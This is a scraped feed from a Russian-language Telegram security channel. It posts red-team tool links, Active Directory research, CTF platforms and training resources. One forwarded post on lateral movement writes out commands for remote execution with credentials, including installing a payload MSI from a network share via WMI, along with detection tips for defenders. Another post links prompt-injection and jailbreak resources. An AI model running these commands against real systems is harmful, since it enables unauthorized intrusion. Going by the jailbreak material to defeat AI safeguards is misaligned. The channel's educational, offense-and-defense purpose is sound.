Whitehat Lab – Telegram
Whitehat Lab
1.86K subscribers
327 photos
372 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
💻 Площадки с задачами по программированию на различных ЯП

🔗 Codewars
🔗 Codeforces
🔗 LeetCode
🔗 Codebattle
🔗 Coderun
🔗 Hackerrank
🔗 Codinggame

В свое время пользовался Codewars, огромное количество задач различных сложностей

#coder #codewars #coderun #programming

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
2
🧙😅 Давным-давно в далёкой-далёкой галактике... В бытность моей молодости, когда деревья были выше и трава зеленее 😅

Всех причастных с днем! 🥳🥳🥳

Сегодня пятница, всем разрешаю бахнуть пивка, главное холодненького 🍺🍺🍺


#sysadm

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
104😁1🏆11
Forwarded from Ralf Hacker Channel (Ralf Hacker)
У SpecterOps очередная крутая статья про сбор данных из ADWS.

https://specterops.io/blog/2025/07/25/make-sure-to-use-soapy-an-operators-guide-to-stealthy-ad-collection-using-adws/

Что еще полезного: как использовать утилиту SoaPy, конвертировать данные в формат BloodHound, ну и конечно как обнаружить этот самый сбор данных домена.

#ad #pentes #redteam #enum #bloodhound #soap
321
💻 How to recover from a Golden gMSA attack

This article describes an approach to repairing the credentials of a group Managed Service Account (gMSA) that are affected by a domain controller database exposure incident


🔗 Link

#windows #ad #gmsa

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from 1N73LL1G3NC3
NetExec: Enumerate Logged-On Users with the Remote Registry Service

Session enumeration is only possible with admin privileges? That is a problem of the past thanks to the new --reg-sessions core functionality of NetExec. SID values are the registry hives from NTUSER.dat which are loaded/unloaded depending on the user being logged in or not.

Blog: Session Enumeration Through Remote Registry
👍61🔥1
💻 evil-winrm-py 1.4.0

Аналог одноименной утилиты написанный на 😰 Python

Установка:

uv tool install --python 3.12 'git+https://github.com/adityatelange/evil-winrm-py'


💻 Repo
💻 Docs

#soft #python

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Комментаторы с Реддита фигни не скажут 😂😅

#ai

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
😁9
ChromeAlone - A Browser C2 Framework

Инструмент для превращения Chromium браузеров в C2 имплант 👍😅

💻 Repo

#c2 #chromium #chromealone #redteam

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4
💻 Windows EPM Poisoning

Очень большой разбор (eng)

▪️ Research

#windows #rpc #epm

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RedBlue Notes
Горизонтальное перемещение: тени в инфраструктуре
Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

Продолжаем говорить про перемещение, сегодня будут интересные утилиты.

Тихий проход через Headless RDP 😑
Представьте: вы хотите попасть с одной машины на другую, но не размахивая флагом в логах. Один из элегантных способов — Headless RDP через SharpRDP. Команда:
SharpRDP.exe computername=DC01 command=calc username=OFFENSE\admin password=Passw0rd

Вот и вы уже запускаете код на удаленном узле, без графического окна и лишних признаков. Защитникам в таких случаях стоит обращать внимание на неожиданные загрузки mstscax.dll или RDP-трафик без интерактивной сессии.

WMI с MSI: установка, которая не то, чем кажется 🤯
Другой и один из любимых методов — WMI с деплоем MSI. С точки зрения системы, это установка пакета, но внутри — полезная нагрузка:
Invoke-WmiMethod -Path Win32_Product -Name Install -ArgumentList @($true,"","\\192.168.1.4\share\payload.msi") -ComputerName TARGET -Credential $cred

Стороне атаки такой способ дает тишину, стороне защиты — повод мониторить необычные MSI-установки через WMI.

PsExec: громкий, но надежный 🍞
Но нельзя обойти стороной и классику — PsExec. Это инструмент, который админы обожают за удобство, а синие команды — за предсказуемые следы. Запуск может выглядеть так:
PsExec.exe \\TARGET -u Domain\Admin -p P@ssword cmd.exe

Быстро, просто… и громко: появляется служба PSEXESVC, фиксируется SMB-трафик, остаются артефакты. Опытный атакующий может переименовать службу, очистить следы или использовать модифицированные версии. Опытный защитник — найдет их по событию 7045, именованным каналам \\.\pipe\psexesvc и подозрительным RPC-запросам.

GoExec: современный шпион 👀
Тем, кто ценит тишину, стоит взглянуть на GoExec — современный аналог, умеющий работать через прокси и минимизировать новые артефакты. Он не так распространен, поэтому часто проходит под радаром:
goexec --method scmr change --proxy 127.0.0.1:1080 TARGET_IP command.exe

Для атакующего — это способ двигаться в полутьме, для защитника — повод расширить поведенческую аналитику.

Как итог 🍩
Весь этот арсенал объединяет простая логика: чем ближе способ к легитимной административной операции, тем сложнее его заметить. Для красных команд это значит — мимикрировать под штатную работу админа. Для синих — изучить эти «будни администратора» так, чтобы любое несоответствие бросалось в глаза.

Если вы дочитали до этого места — значит, вам точно интересна эта кухня. Поддержите статью лайком и подпишитесь на канал — впереди еще больше разборов, техник и историй с обеих сторон.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥331
💻 Command Challenge

Нашел очередную, но достойную интерактивную платформу для тренировки работы в командной строке 🐧Linux. Так еще и oneliners просят 👍😱

🔗 cmdchallenge.com

Здесь и здесь более продвинутый уровень, либо оболочка bash ограничена

Знаете ли вы как можно вывести список всех файлов в директории не использую ls, а сделать это использую только echo ? 😳😁

#linux #cmd #bash

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6432
👩‍💻 Awesome prompt hacking

Список ресурсов для тех, кто интересуется AI Red Teaming, Jailbreaking и Prompt Injection

💻 Repo

#llm #ai #prompt

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔒 BitLocker Registry Exploited via WMI for Code Execution

A newly discovered lateral movement technique, revealed through the BitLockMove proof-of-concept, demonstrates how attackers can exploit BitLocker’s Component Object Model (COM) structure to execute malicious code under the context of an interactive user


🔗 Lateral Movement - BitLocker

#bitlocker #wmi #windows #redteam

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🤝3
📨 NoSQL injections

Немного про NoSQL инъекции

🔗 General details
🔗 Getting rid of pre-/post-conditions in NoSQLi
🔗 NoSQL error-based injection
🔗 Payloads

#web #pentest #nosql

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 🚩 💻Список площадок для оттачивания навыков этичного хакинга, подойдет для тренировок, CTF и не только

UPD. Добавил пару площадок для SOC

😉 Hack The Box
Windows, *nix машины для самостоятельного пентеста. Во free тарифе всегда доступно 20 машин. Обучение, академия, лабы и т.д. Есть огромное количество CTF заданий в различных категориях.
Возможность сдать экзамены и получить сертификаты CBBH (Certified Bug Bounty Hunter), CPTS (Certified Penetration Testing Specialist), CWEE (Certified Web Exploitation Expert) и CDSA (Certified Defensive Security Analyst), CAPE (Certified Active Directory Pentesting Expert)


😉 TryHackMe
Аналог HackTheBox без CTF заданий. Академия в наличии


😉 PortSwigger
Академия веб пентеста от создателей BurpSuite. Для сдачи экзамена необходима активная подписка на Burp Suite Professional, цена экзамена 99$


😉 CTFtime
Информацию почти обо всех прошедших и предстоящих CTF соревнованиях можно найти здесь


😉 HackerLab
Русскоязычная площадка 😎. Большое количество CTF задач в самых различных категориях, в наличии Windows и Linux машины


😉 CryptoHack
Один из лучших ресурсов с задачами по криптографии. Нравится криптография ? Вам сюда, от азов до сложнейших задач


😉 Standoff365
Киберполигон от компании Positive Technologies. Это виртуальная инфраструктура с реалистичными копиями IT-систем из разных отраслей


😉 TaipanByte CTF
Русскоязычная площадка от ребят из команды TaipanByte, большое кол-во задач во всех основных категориях


😉 pwn.college
Образовательная платформа, позволяющая изучать и практиковать основные концепции кибербезопасности. Рассчитана на новичков


😉 Kontra
Appsec тренировки, LLM, owasp top10, owasp api top10, aws top10 и т.д.


😉 Linux Journey
Путешествие в мир Linux, основные команды, лабы, руководства


😉 OverTheWire Bandit
Игра из 34 уровней для изучения Linux


😉 Crackmes
Большое количество (~4000) крякми для изучения. Подойдет реверсерам


😉 Pwnable
Для любителей бинарной эксплуатации (PWN)


😉 Cyber-Ed
Русскоязычная площадка. One task of the month - выкладывают по 1ой CTF задаче в месяц


😉 Root Me
Огромное (500+) кол-во заданий в самых разных категориях


😉 picoCTF
Площадка с CTF заданиями начального уровня, почти на все задания можно найти райтапы


😉 Exploit Education
ВМ Phoenix для изучения уязвимостей, разработки эксплойтов, отладки программного обеспечения и общих проблем кибербезопасности


😉 0xf.at
Парольные загадки (ребусы), например, пароль это сумма чисел от 1 до 446, соответственно надо написать простенькую автоматизацию и ввести в поле ввода


😉 Hacker Test
Простенький хакер квест состоящий из 20 уровней


Пара платформ для защитников:

😉 LetsDefend
Расследование реальных кибератак внутри смоделированного SOC


😉 Blue Team Training
Практическое обучение по кибербезопасности, а также развитие навыков в лабораториях CyberRange


⚠️ P.S. Если вы знаете подобные площадки, лично проверяли и они заслуживают внимания, пишите пожалуйста в чат - @whitehat_chat

#crackmes #hacking #ctf #ethical

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1352🤝1
🚀 AI Engineering Hub

Подробные руководства по LLMs and RAGs

💻 Repo

#ai #llm #rag

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍1
BamboozlEDR

Генератор различных событий (EventID) для тестирования EDR

Microsoft-Windows-Antimalware - Threat detection events (Event ID 48)
Microsoft-Windows-Antimalware-RTP - Real-time protection events (Event IDs 27, 14)
Microsoft-Windows-LDAP-Client - LDAP search and authentication events
Microsoft-Windows-TCPIP - TCP/IP connection events
Microsoft-Windows-WMI-Activity - WMI query and execution events (Event IDs 22, 11)
Microsoft-Windows-AMSI - AMSI scan events
Microsoft-Windows-Defender - Windows Defender events (Event IDs 5000, 5001, 1116, 1117)
Microsoft-Windows-DotNETRuntime - .NET runtime events
Microsoft-Windows-Crypto-DPAPI-Events - DPAPI access events
Microsoft-Windows-Security-Auditing - Security audit events (Event ID 4688)
Microsoft-Windows-PowerShell - PowerShell commandlet and AMSI events
Microsoft-Windows-RPC - RPC function trace events (Event ID 14)
Microsoft-Windows-CodeIntegrity - Code Integrity events (Event IDs 3023, 3036, 3076, 3077)
Microsoft-Windows-AppLocker - AppLocker events (Event IDs 8003, 8004, 8006, 8007, 8021, 8022, 8024, 8025)
Microsoft-Windows-NTLM - NTLM blocking events (Event ID 8001)


💻 Repo

#edr #golang

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
11
Forwarded from Bagley's 📚 Notes
Всем 👋! Это Bagley

💬 Всё чаще стал замечать в тематических каналах вопросы:
Как смочь в этом направлении. Дайте дельных советов. Очень интересная тема, но где нырять в неё чтобы не слишком глубоко было. Какую литературу почитать для хорошего фундамента можно?

хотелось бы вникнуть и научится (желательно бесплатно)

с чего начать, что почитать, где посмотреть?

💭 Чтобы облегчить задачу с поиском, поделюсь своим мнением по этому поводу (📖 Для начала ознакомиться с этим постом)


#️⃣ Литература
🔘The Web Application Hackers Handbook
🔘Ловушка для багов. Полевое руководство по веб-хакингу
🔘Bug Bounty Bootcamp The Guide to Finding and Reporting Web Vulnerabilities
🔘Bug Bounty Playbook
🔘Bug Bounty Hunting Essentials
🔘Web Hacking 101
🔘The tangled Web a guide to securing modern Web applications
⚠️Немного для мобилок
🔘Android Security Internals
🔘IOS Application Security

#️⃣ Методологии
🔘Bug Hunters Methodology от JHaddix'a: Recon и App Analysis Master
🔘ZSeanos methodology
🔘WSTG от OWASP

#️⃣ YouTube каналы
🔘PinkDraconian
🔘NahamSec
🔘Bug Bounty Reports Explained
🔘STÖK
🔘Rana Khalil
🔘InsiderPhD
🔘John Hammond

множество тематических TG-каналов
личные страницы исследователей, например в X

#learning
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥21
💻 🗂 Доклады с конференции Black Hat USA 2025

Notes from Black Hat USA 2024:

“I hate to report it, but the Russian underground is as strong as ever”


🎃👍

💻 Slides

#pentest #blackhat #blackhatusa

✈️ Whitehat Lab 💬Chat
Please open Telegram to view this post
VIEW IN TELEGRAM
😁54